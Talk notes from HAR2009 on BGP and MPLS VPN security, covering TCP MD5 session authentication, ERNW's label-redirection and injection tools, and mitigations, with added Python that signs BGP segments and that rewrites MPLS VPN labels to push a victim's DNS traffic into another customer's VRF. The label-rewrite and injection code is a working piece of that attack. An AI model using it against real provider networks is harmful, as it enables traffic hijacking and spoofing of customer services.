Information on the talk can be found on the HAR2009 Wiki. The talk was limited by its time slot; the MPLS Layer 2 VPN part in particular was rushed, so my notes on it are thin. I'd suggest checking out the slides once they're posted (they are not currently listed in the program).
Main focus of the talk will be on
- Carrier Ethernet
BGP
Works over and relies on TCP/IP.
Harder to spoof than a UDP-based protocol: because BGP runs over TCP, an attacker has to hit the session's 4-tuple and the current sequence numbers rather than sending a single fire-and-forget packet.
The BGP trust model rests on manual configuration (or scripts) of peerings and filters; the speakers call this "intra-operator trust". Because updates and filters are maintained by hand, it is prone to human error (see the AS7007 incident of 1997 and the Pakistan Telecom/YouTube hijack of 2008).
“Once you’re a member of the ‘global BGP community’ you might perform all sorts of nasty stuff” (Pilosov / Kapela, 2008)
BGP security is not built into the protocol itself; it relies on the protection TCP offers. In practice that means the "TCP MD5 Signature Option" (RFC 2385), a per-segment MD5 digest keyed with a static shared secret. The IETF TCPM working group is currently working on a replacement, the TCP Authentication Option (TCP-AO). MD5 keys are often not used in large installations because managing static per-peer secrets is cumbersome.
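To make the RFC 2385 mechanism concrete, here is an added illustration (not code from the talk or from ERNW) of how the MD5 signature option is computed and checked. The digest covers the IPv4 pseudo-header, the fixed TCP header with the checksum zeroed, the segment data and the shared key, in that order, so a spoofed RST, a replayed segment with an altered sequence number, or the same segment from another source address all fail verification. Addresses, ports, sequence numbers and the key are constructed sample values.

```python
"""
RFC 2385 "TCP MD5 Signature Option" as used on BGP sessions.
Added illustration for these notes, not code from the talk or from ERNW.
Addresses, ports, sequence numbers and the key are constructed sample values.
"""
import hashlib
import hmac
import socket
import struct

KIND_NOP = 1
KIND_MD5 = 19        # option kind assigned by RFC 2385
MD5_OPT_LEN = 18     # kind (1) + length (1) + 16-byte digest
BGP_PORT = 179
FLAG_RST, FLAG_PSH_ACK = 0x04, 0x18


def build_tcp_header(sport, dport, seq, ack, flags, window=65535, options_len=20):
    """20-byte fixed TCP header with checksum and urgent pointer zeroed.
    options_len (padded to 4 bytes) is folded into the data-offset field."""
    if options_len % 4:
        raise ValueError("TCP options must be padded to a 4-byte boundary")
    data_offset = (20 + options_len) // 4
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                       (data_offset << 12) | flags, window, 0, 0)


def tcp_md5_digest(src_ip, dst_ip, header, options_len, payload, key):
    """MD5 over, in this order: IPv4 pseudo-header, fixed TCP header with
    checksum = 0 (options excluded), segment data, shared key (RFC 2385 s.2.0)."""
    tcp_len = len(header) + options_len + len(payload)
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, socket.IPPROTO_TCP, tcp_len))
    header_zero_csum = header[:16] + b"\x00\x00" + header[18:]
    return hashlib.md5(pseudo + header_zero_csum + payload + key).digest()


def sign_segment(src_ip, dst_ip, header, payload, key):
    """Sender side: return the 20-byte options block NOP NOP [19][18][digest]."""
    options_len = 2 + MD5_OPT_LEN
    digest = tcp_md5_digest(src_ip, dst_ip, header, options_len, payload, key)
    return bytes([KIND_NOP, KIND_NOP, KIND_MD5, MD5_OPT_LEN]) + digest


def verify_segment(src_ip, dst_ip, header, options, payload, key):
    """Receiver side: walk the options, find the MD5 option and compare digests
    in constant time. A segment without the option is rejected, as RFC 2385
    requires once the option is enabled on a connection."""
    i = 0
    while i < len(options):
        kind = options[i]
        if kind == 0:                       # end of option list
            break
        if kind == KIND_NOP:
            i += 1
            continue
        if i + 1 >= len(options):
            break                           # malformed: no length byte
        length = options[i + 1]
        if kind == KIND_MD5 and length == MD5_OPT_LEN and i + length <= len(options):
            received = options[i + 2:i + MD5_OPT_LEN]
            expected = tcp_md5_digest(src_ip, dst_ip, header, len(options), payload, key)
            return hmac.compare_digest(received, expected)
        if length < 2:
            break                           # malformed option, stop parsing
        i += length
    return False


# BGP KEEPALIVE: 16-byte all-ones marker, length 19, type 4
BGP_KEEPALIVE = b"\xff" * 16 + struct.pack("!HB", 19, 4)


def demo():
    key = b"s3cr3t-peer-key"                 # configured on both routers (constructed)
    r1, r2 = "192.0.2.1", "192.0.2.2"         # RFC 5737 documentation addresses
    hdr = build_tcp_header(BGP_PORT, 51000, seq=1000, ack=2000, flags=FLAG_PSH_ACK)
    opts = sign_segment(r1, r2, hdr, BGP_KEEPALIVE, key)

    genuine = verify_segment(r1, r2, hdr, opts, BGP_KEEPALIVE, key)
    # Attacker knows the 4-tuple and sequence numbers but not the key.
    rst_hdr = build_tcp_header(BGP_PORT, 51000, seq=1000, ack=2000, flags=FLAG_RST)
    rst_opts = sign_segment(r1, r2, rst_hdr, b"", b"guessed-key")
    forged_rst = verify_segment(r1, r2, rst_hdr, rst_opts, b"", key)
    # Sniffed genuine segment replayed with a modified sequence number: the header is covered.
    tampered_hdr = build_tcp_header(BGP_PORT, 51000, seq=1001, ack=2000, flags=FLAG_PSH_ACK)
    tampered = verify_segment(r1, r2, tampered_hdr, opts, BGP_KEEPALIVE, key)
    # Same genuine segment sent from another source address: the pseudo-header is covered.
    replayed = verify_segment("198.51.100.9", r2, hdr, opts, BGP_KEEPALIVE, key)
    # Segment carrying no MD5 option at all.
    unsigned = verify_segment(r1, r2, hdr, b"\x01\x01\x00\x00", BGP_KEEPALIVE, key)
    return {"genuine": genuine, "forged_rst": forged_rst, "tampered_seq": tampered,
            "replayed_from_other_ip": replayed, "unsigned": unsigned}
```

On Linux the same mechanism is exposed to applications through the TCP_MD5SIG socket option, with one static key per peer address; there is no rekeying or key rollover in the protocol, which is the management burden the notes mention and one of the motivations for TCP-AO.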
Tools (including live demos)
MPLS is defined in RFC 3031 and is used in provider backbones to forward traffic by label rather than by IP lookup. A packet can carry a stack of several labels.
Both MPLS Layer 3 VPNs (RFC 4364) and MPLS Layer 2 VPNs (RFC) are discussed, as both are found in most large organizations.
MPLS Layer 3 VPNs
Comparable to Frame Relay/ATM in some respects: the provider offers each customer a private network over a shared infrastructure.
A highly "virtual" technology: customer separation exists only in the label stack and in the PE routers' VRF tables, not in any physical separation.
During transport two labels are used:
- First (outer): the transport label, which identifies the path to the egress PE router.
- Second (inner): the VPN label, which the egress PE uses to select the customer's VRF, i.e. the particular VPN.
Because each VPN lives in its own VRF, multiple customers can use the same (overlapping) IP address space.
Once an attacker is inside the MPLS core, they can do almost anything they want. The design keeps attackers outside the provider network out, but inside it there are no additional security controls: the core is trusted by definition.
POC attack tool for MPLS redirection – mps_redirect
The command-line tool rewrites the VPN labels of packets so that all traffic for the victim's network is redirected into the attacker's network.
MPLS labels are transmitted in clear text and unauthenticated across the core. By sitting in the data path it is possible to rewrite the labels and move traffic between VPNs.
This allows systems to be spoofed at the MPLS level, for example replacing a customer's DNS or LDAP server with an attacker-controlled one.
POC attack tool for MPLS injection – mps_tun
Creates a TUN interface through which the attacker can inject packets into the VPN tunnel (so any ordinary attack tool can simply be pointed at the TUN interface).
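The two-label stack described under Layer 3 VPNs, the label rewrite behind mps_redirect and the encapsulation a TUN-style injector like mps_tun has to perform all come down to the same few bytes. The following is an added illustration for these notes, not ERNW's tool code: it parses and serialises an RFC 3032 label stack, builds a labelled frame from a plain IP packet, and swaps only the bottom-of-stack (VPN) label so the egress PE hands an unchanged IP packet to a different customer VRF. The label values, MAC addresses (IANA documentation range 00-00-5E-00-53-xx) and IP addresses are constructed sample data.

```python
"""
MPLS label-stack parsing, rewriting and encapsulation (RFC 3032 encoding).
Added illustration for these notes; it is not ERNW's mps_redirect/mps_tun code.
Label values, MAC and IP addresses below are constructed sample data.
"""
import struct

ETHERTYPE_MPLS_UNICAST = 0x8847
ETH_HDR_LEN = 14


def parse_label_stack(data):
    """Decode label stack entries from the bytes that follow the Ethertype.

    Each 32-bit entry is: label (20 bits) | TC (3) | bottom-of-stack S (1) | TTL (8).
    Returns (entries, offset) where offset is where the inner packet starts.
    """
    entries, off = [], 0
    while True:
        if off + 4 > len(data):
            raise ValueError("truncated MPLS label stack")
        (word,) = struct.unpack("!I", data[off:off + 4])
        entry = {"label": word >> 12, "tc": (word >> 9) & 0x7,
                 "bos": (word >> 8) & 0x1, "ttl": word & 0xFF}
        entries.append(entry)
        off += 4
        if entry["bos"]:
            return entries, off


def encode_label_stack(entries):
    """Serialise entries; the S bit is set only on the last (innermost) entry."""
    out = bytearray()
    for i, e in enumerate(entries):
        if not 0 <= e["label"] < (1 << 20):
            raise ValueError("label out of range")
        bos = 1 if i == len(entries) - 1 else 0
        out += struct.pack("!I", (e["label"] << 12) | (e["tc"] << 9) | (bos << 8) | e["ttl"])
    return bytes(out)


def encapsulate(dst_mac, src_mac, transport_label, vpn_label, ip_packet, ttl=64):
    """Build a core-bound frame the way a TUN-style injector would:
    outer label = path to the egress PE, inner label = target VRF."""
    stack = [{"label": transport_label, "tc": 0, "bos": 0, "ttl": ttl},
             {"label": vpn_label, "tc": 0, "bos": 1, "ttl": ttl}]
    eth = dst_mac + src_mac + struct.pack("!H", ETHERTYPE_MPLS_UNICAST)
    return eth + encode_label_stack(stack) + ip_packet


def rewrite_vpn_label(frame, new_vpn_label):
    """On-path label rewrite: swap only the bottom-of-stack (VPN) label so the
    egress PE delivers the untouched IP packet into a different customer VRF."""
    eth, rest = frame[:ETH_HDR_LEN], frame[ETH_HDR_LEN:]
    if struct.unpack("!H", eth[12:14])[0] != ETHERTYPE_MPLS_UNICAST:
        raise ValueError("not an MPLS unicast frame")
    entries, off = parse_label_stack(rest)
    entries[-1]["label"] = new_vpn_label
    return eth + encode_label_stack(entries) + rest[off:]


def labels_of(frame):
    """Label values in the frame's stack, outermost first."""
    return [e["label"] for e in parse_label_stack(frame[ETH_HDR_LEN:])[0]]


def ipv4_checksum(header):
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_sample_ip_packet():
    """Constructed IPv4/UDP datagram from a victim host to its DNS server (10.0.0.53)."""
    payload = b"\xab\xcd\x01\x00"          # stand-in for the first bytes of a DNS query
    udp = struct.pack("!HHHH", 40000, 53, 8 + len(payload), 0) + payload
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0x1234, 0, 64, 17, 0,
                      bytes([10, 0, 0, 1]), bytes([10, 0, 0, 53]))
    hdr = hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]
    return hdr + udp


def demo():
    """Customer A's packet (VPN label 100) is relabelled into customer B's VRF (label 200)."""
    pe_mac, p_mac = b"\x00\x00\x5e\x00\x53\x01", b"\x00\x00\x5e\x00\x53\x02"
    ip = build_sample_ip_packet()
    original = encapsulate(pe_mac, p_mac, transport_label=16003, vpn_label=100, ip_packet=ip)
    redirected = rewrite_vpn_label(original, 200)
    return {
        "before": labels_of(original),
        "after": labels_of(redirected),
        "ip_untouched": redirected[ETH_HDR_LEN + 8:] == ip,
    }
```

Nothing in the frame ties the inner label to the IP packet it carries, which is the whole point: a device in the data path that can write a single 32-bit word moves the packet, and with it the DNS query above, into whichever VRF the attacker chooses, while the egress PE has no way to notice.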
The speakers estimate that with 60-80% of providers an attacker could obtain complete control over an MPLS endpoint, which is all that is needed to carry out these attacks.
Mitigation: authenticate everything, and implement "borders of trust" that encrypt/decrypt all traffic at the site border (for example an IPsec overlay between sites), so that the MPLS core no longer has to be trusted.
MPLS Layer 2 VPNs
Because the provider transports the customer's Ethernet frames unchanged, these networks expose the VPNs to the usual layer 2 threats, such as ARP spoofing across sites of a VPN. Most Yersinia-style attacks will also work in the MPLS cloud.
The presenters are running a workshop (full MPLS lab setup) at FuWaR village at 14:30 today
Update: some of the tools and the presentation can be downloaded from the ERNW.DE website; the Black Hat Europe presentation appears to be the most recent one there.